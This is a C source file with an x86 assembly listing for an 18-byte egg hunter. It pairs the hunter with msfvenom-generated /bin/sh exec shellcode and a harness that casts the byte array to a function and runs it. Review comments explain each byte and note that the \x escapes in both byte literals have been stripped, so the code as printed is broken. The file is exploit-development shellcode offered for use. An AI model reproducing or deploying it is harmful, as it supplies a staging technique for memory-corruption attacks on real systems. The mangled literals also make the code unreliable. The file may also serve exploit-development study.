// Description: an 18-byte egg hunter for contiguous memory segments
//
// You are free to do whatever you want with this shellcode
//
// @phackt_ul
/*
global _start

section .text
_start:

mov eax, _start ; we set a valid .text address into eax
mov ebx, dword 0x50905091 ; we can avoid an 8-byte tag in the egg as long as the tag
dec ebx ; cannot be found in the egg hunter itself; that is why we decrement, to look for
; 0x50905090 - push eax, nop, push eax, nop

next_addr:

inc eax
cmp dword [eax], ebx ; did we find the tag?
jne next_addr
jmp eax ; yes we did, so jump to the egg
*/
#include <stdio.h>
#include <string.h>

/* The 18 bytes of the _start routine in the listing above, in execution order:
 *   b8 60 80 04 08   mov eax, 0x08048060   -- literal, non-PIE .text address
 *   bb 91 50 90 50   mov ebx, 0x50905091
 *   4b               dec ebx               -- ebx = 0x50905090, the tag
 *   40               inc eax
 *   39 18            cmp [eax], ebx
 *   75 fb            jne  (back to inc eax)
 *   ff e0            jmp eax
 * The scan performs no access check, so an unmapped page between the hunter
 * and the egg ends the search with a fault; the header's "contiguous memory
 * segments" wording is that limitation.
 * NOTE(review): as printed here the literal lacks the backslash of each `\x`
 * escape, so it is not the byte string the listing describes -- presumably
 * lost in copying. */
unsigned char egghunter[] =
"xb8x60x80x04x08xbbx91x50x90x50x4bx40x39x18x75xfbxffxe0";

/* Buffer the hunter searches for. The first dword is the tag the hunter
 * compares against (bytes 90 50 90 50 read little-endian as 0x50905090);
 * the remainder is the msfvenom output named in the trailing comment.
 * strlen() is used below to size both buffers, so neither may contain 0x00;
 * the `-b x00` option in that comment is what keeps it out of the egg.
 * NOTE(review): the `\x` escapes appear stripped here, as in egghunter. */
unsigned char egg[] =
"x90x50x90x50" // egg mark - do not remove
"xbdx64xb2x0cxf4xdaxc2xd9x74x24xf4x5ax31xc9xb1" // msfvenom -p linux/x86/exec CMD=/bin/sh -f c -b x00
"x0bx83xc2x04x31x6ax11x03x6ax11xe2x91xd8x07xac"
"xc0x4fx7ex24xdfx0cxf7x53x77xfcx74xf4x87x6ax54"
"x66xeex04x23x85xa2x30x3bx4ax42xc1x13x28x2bxaf"
"x44xdfxc3x2fxccx4cx9axd1x3fxf2";

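/*
 * Harness: prints the length of both buffers, then transfers control to the
 * egg hunter, which scans memory for the tag and jumps to the egg.
 *
 * Returns the hunter's result only if it ever returns; the listing above ends
 * in `jmp eax` and has no ret, so in practice this function does not return.
 *
 * NOTE(review): both buffers live in writable .data, so on an NX/W^X build
 * the indirect call faults before a single byte of the hunter executes; the
 * original source does not say which build flags it assumes.
 */
int main(void)
{
    /* strlen() sizes the buffers, which requires that neither contains a
       0x00 byte; the egg's msfvenom comment shows it was generated to avoid
       that byte. %zu matches size_t -- the original %d was a type mismatch. */
    printf("Egg hunter shellcode Length: %zu ", strlen((const char *)egghunter));
    printf("Egg shellcode Length: %zu ", strlen((const char *)egg));

    /* Reinterpret the byte array as code and call into it. */
    int (*ret)(void) = (int (*)(void))egghunter;

    return ret();
}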